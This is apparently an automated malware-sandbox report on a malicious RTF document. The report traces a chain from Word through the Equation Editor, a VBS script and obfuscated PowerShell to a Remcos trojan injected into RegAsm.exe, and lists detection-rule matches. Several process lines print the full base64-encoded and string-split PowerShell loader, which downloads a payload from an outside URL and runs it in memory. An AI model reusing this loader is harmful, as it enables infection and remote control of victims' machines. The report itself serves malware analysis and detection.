              Source: Process Memory Space: powershell.exe PID: 3640, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 3640, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: RegAsm.exe PID: 3764, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winRTF@11/16@3/4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,9_2_00417952
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,9_2_0040F474
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,9_2_0041B4A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AA4A
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$NwFiUxpf.rtfJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-R2I0JW
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR75BB.tmpJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS"
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: beNwFiUxpf.rtfReversingLabs: Detection: 47%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydwLHh3cHgnKyd3cCcrJyknKycpJykuckVwTEFjZSgoW2NIQVJdNjUrW2NIQVJdMTExK1tjSEFSXTExMCksW1N0UklOR11bY0hBUl0zNikuckVwTEFjZSgneHdwJyxbU3RSSU5HXVtjSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllid[1]+$SHeLlID[13]+'X')( ('Aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'Deta'+'hNoteV.tx'+'txwp;A'+'onb'+'ase6'+'4Conten'+'t ='+' '+'(New'+'-O'+'bj'+'ect Sy'+'stem.Net'+'.Web'+'Cli'+'ent).D'+'ownloadString(Ao'+'nurl'+');Aonbina'+'ry'+'Content'+' '+'= ['+'S'+'ystem.C'+'onvert]'+'::'+'F'+'romB'+'as'+'e64Stri'+'ng'+'(Aonbas'+'e64Con'+'te'+'n'+'t);Aona'+'ssembly = [Re'+'flect'+'ion'+'.'+'Asse'+'mbly]::Load(A'+'on'+'b'+'inaryContent)'+';Aontype = '+'A'+'on'+'a'+'ssemb'+'l'+'y'+'.Ge'+'tT'+'yp'+'e'+'(xwpRu'+'nP'+'E.'+'Homexwp)'+';Aon'+'method'+' ='+' '+'Aon'+'type.G'+'etMethod(xwpVAI'+'xw'+'p'+');Ao'+'nmethod'+'.In'+'voke(Ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.C'+'CO'+'NK/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'RegAsmx'+'w'+'p,xwpx'+'wp'+')'+')').rEpLAce(([cHAR]65+[cHAR]111+[cHAR]110),[StRING][cHAR]36).rEpLAce('xwp',[StRING][cHAR]39))"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydwLHh3cHgnKyd3cCcrJyknKycpJykuckVwTEFjZSgoW2NIQVJdNjUrW2NIQVJdMTExK1tjSEFSXTExMCksW1N0UklOR11bY0hBUl0zNikuckVwTEFjZSgneHdwJyxbU3RSSU5HXVtjSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllid[1]+$SHeLlID[13]+'X')( ('Aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'Deta'+'hNoteV.tx'+'txwp;A'+'onb'+'ase6'+'4Conten'+'t ='+' '+'(New'+'-O'+'bj'+'ect Sy'+'stem.Net'+'.Web'+'Cli'+'ent).D'+'ownloadString(Ao'+'nurl'+');Aonbina'+'ry'+'Content'+' '+'= ['+'S'+'ystem.C'+'onvert]'+'::'+'F'+'romB'+'as'+'e64Stri'+'ng'+'(Aonbas'+'e64Con'+'te'+'n'+'t);Aona'+'ssembly = [Re'+'flect'+'ion'+'.'+'Asse'+'mbly]::Load(A'+'on'+'b'+'inaryContent)'+';Aontype = '+'A'+'on'+'a'+'ssemb'+'l'+'y'+'.Ge'+'tT'+'yp'+'e'+'(xwpRu'+'nP'+'E.'+'Homexwp)'+';Aon'+'method'+' ='+' '+'Aon'+'type.G'+'etMethod(xwpVAI'+'xw'+'p'+');Ao'+'nmethod'+'.In'+'voke(Ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.C'+'CO'+'NK/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'RegAsmx'+'w'+'p,xwpx'+'wp'+')'+')').rEpLAce(([cHAR]65+[cHAR]111+[cHAR]110),[StRING][cHAR]36).rEpLAce('xwp',[StRING][cHAR]39))"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: beNwFiUxpf.LNK.0.drLNK file: ..\..\..\..\..\Desktop\beNwFiUxpf.rtf
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000008.00000002.381541630.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.378809555.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
